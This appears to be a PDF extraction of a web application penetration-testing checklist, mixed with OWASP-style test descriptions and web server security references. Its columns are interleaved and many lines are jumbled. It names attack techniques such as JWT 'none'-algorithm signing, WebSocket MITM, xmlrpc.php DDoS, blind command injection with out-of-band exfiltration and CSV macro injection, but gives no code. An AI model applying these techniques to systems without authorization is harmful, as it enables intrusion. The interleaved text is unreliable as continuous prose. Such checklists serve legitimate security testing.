internal/captcha/images/24.png) Enumerate all possible domains (previous
and current).
- [ ] Check for the server side validation Test for Subdomain Takeover
for CAPTCHA.Remove captcha block from Identify forgotten or misconfigured
GUI using firebug addon and submit domains.
request to the server
Assess that the access control
- [ ] Check if image recognition can be configuration for the storage services is
done with OCR tool? Configuration and Deployment Test Cloud Storage properly in place.
Management Testing
- **JWT Token Testing** Review the Content-Security-Policy
header or meta element to identify
- [ ] Brute-forcing secret keys Testing for Content Security Policy misconfigurations.

- [ ] Signing a new token with the Apache

“none” algorithm
Apache Security, by Ivan Ristic, O’reilly,
- [ ] Changing the signing algorithm of March 2005.
the token (for fuzzing purposes)
Apache Security Secrets: Revealed (
- [ ] Signing the asymmetrically-signed Again), Mark Cox, November 2003
token to its symmetric algorithm match (
when you have the original public key) Apache Security Secrets: Revealed,
ApacheCon 2002, Las Vegas, Mark J Cox,
- **Websockets Testing** October 2002

- [ ] Intercepting and modifying Performance Tuning

WebSocket messages
Lotus Domino
- [ ] Websockets MITM attempts

Lotus Security Handbook, William Tworek

- [ ] Testing secret header websocket
et al., April 2004, available in the IBM
Redbooks collection
- [ ] Content stealing in websockets

- [ ] Token authentication testing in Lotus Domino Security, an X-force white-

websockets paper, Internet Security Systems,
December 2002
- **GraphQL Vulnerabilities Testing**
Hackproofing Lotus Domino Web Server,
- [ ] Inconsistent Authorization Checks David Litchfield, October 2001

- [ ] Missing Validation of Custom Microsoft IIS

Scalars
Security Best Practices for IIS 8
- [ ] Failure to Appropriately Rate-limit
CIS Microsoft IIS Benchmarks
- [ ] Introspection Query Enabled/
Disabled Securing Your Web Server (Patterns and
Practices), Microsoft Corporation, January
- **WordPress Common Vulnerabilities** 2004

- [ ] XSPA in wordpress IIS Security and Programming

Countermeasures, by Jason Coombs
- [ ] Bruteforce in wp-login.php
From Blueprint to Fortress: A Guide to
- [ ] Information disclosure wordpress
Securing IIS 5.0, by John Davis, Microsoft
username
Corporation, June 2001
- [ ] Backup file wp-config exposed
References Secure Internet Information Services 5
Checklist, by Michael Howard, Microsoft
- [ ] Log files exposed
Corporation, June 2000
- [ ] Denial of Service via load-styles.
php Red Hat’s (formerly Netscape’s) iPlanet

- [ ] Denial of Service via load-scripts. Guide to the Secure Configuration and

php Administration of iPlanet Web Server,
Enterprise Edition 4.1, by James M Hayes,
- [ ] DDOS using xmlrpc.php The Network Applications Team of the
Systems and Network Attack Center (
- **Denial of Service** SNAC), NSA, January 2001

- [ ] Cookie bomb WebSphere

- [ ] Pixel flood, using image with a IBM WebSphere V5.0 Security, WebSphere
huge pixels Handbook Series, by Peter Kovari et al.,
IBM, December 2002.
- [ ] Frame flood, using GIF with a huge
frame IBM WebSphere V4.0 Advanced Edition
Security, by Peter Kovari et al., IBM, March
- [ ] ReDoS (Regex DoS) 2002.

- [ ] CPDoS (Cache Poisoned Denial of General

Service)
Logging Cheat Sheet, OWASP
- **Other Test Cases (All Categories)**
SP 800-92 Guide to Computer Security
- Check for security headers and at least
Log Management, NIST
- [ ] X Frame Options
PCI DSS v3.2.1 Requirement 10 and PA-DSS
v3.2 Requirement 4, PCI Security
- [ ] X-XSS header
Standards Council
- [ ] HSTS header
Generic:
- [ ] CSP header
CERT Security Improvement Modules:
- [ ] Referrer Policy Securing Public Web Servers

- [ ] Cache Control Cirt: Default Password list

- [ ] Public key pins FuzzDB can be used to do brute force

browsing admin login path
- Testing for Role authorization
Common admin or debugging parameters
- [ ] Check if normal user can access
the resources of high privileged users?

- [ ] Forced browsing

- [ ] Insecure direct object reference

- [ ] Parameter tampering to switch

user account to high privileged user

- Blind OS command injection

- [ ] using time delays

- [ ] by redirecting output

- [ ] with out-of-band interaction

- [ ] with out-of-band data

exfiltration

- [ ] Command injection on CSV export (

Upload/Download)

- [ ] CSV Excel Macro Injection

- [ ] If you find phpinfo.php file, check

for the configuration leakage and try to
exploit any network vulnerability.

- [ ] Parameter Pollution Social Media

Sharing Buttons

- Broken Cryptography

- [ ] Cryptography Implementation
Flaw

- [ ] Encrypted Information
Compromised

- [ ] Weak Ciphers Used for

Encryption

- Web Services Testing

- [ ] Test for directory traversal

- [ ] Web services documentation

disclosure Enumeration of services, data
types, input types boundaries and limits

Identify DOM sinks.

Testing for DOM-Based Cross Site Scripting

Build payloads that pertain to every sink
type.

Identify sinks and possible JavaScript

injection points. Testing for JavaScript Execution

Identify HTML injection points and assess

the severity of the injected content. Testing for HTML Injection

Identify injection points that handle URLs

or paths.

Testing for Client-side URL Redirect

Assess the locations that the system could
redirect to.

Identify CSS injection points.

Testing for CSS Injection
Assess the impact of the injection.

Understand security measures in place.

Testing for Clickjacking

Assess how strict the security measures Client-Side Testing
are and if they are bypassable.

Identify the usage of WebSockets.

Testing WebSockets
Assess its implementation by using the
same tests on normal HTTP channels.

Assess the security of the message's origin.

Testing Web Messaging

Validate that it's using safe methods and
validating its input.

Locate sensitive data across the system.

Testing for Cross Site Script Inclusion

Assess the leakage of sensitive data
through various techniques.

Identify sinks with weak input validation.

Testing for Client-side Resource
Manipulation
Assess the impact of the resource
manipulation.

Determine whether the application has any

user accounts with default passwords.

Review whether new user accounts are Testing for Default Credentials
created with weak or predictable
passwords.

Ensure that authentication is applied Testing for Bypassing Authentication

across all services that require it. Schema

Validate that the generated session is

managed securely and do not put the user' Testing for Vulnerable Remember
Authentication Testing
s credentials in danger. Password

Review if the application stores sensitive

information on the client-side.

Testing for Browser Cache Weaknesses

Review if access can occur without
authorization.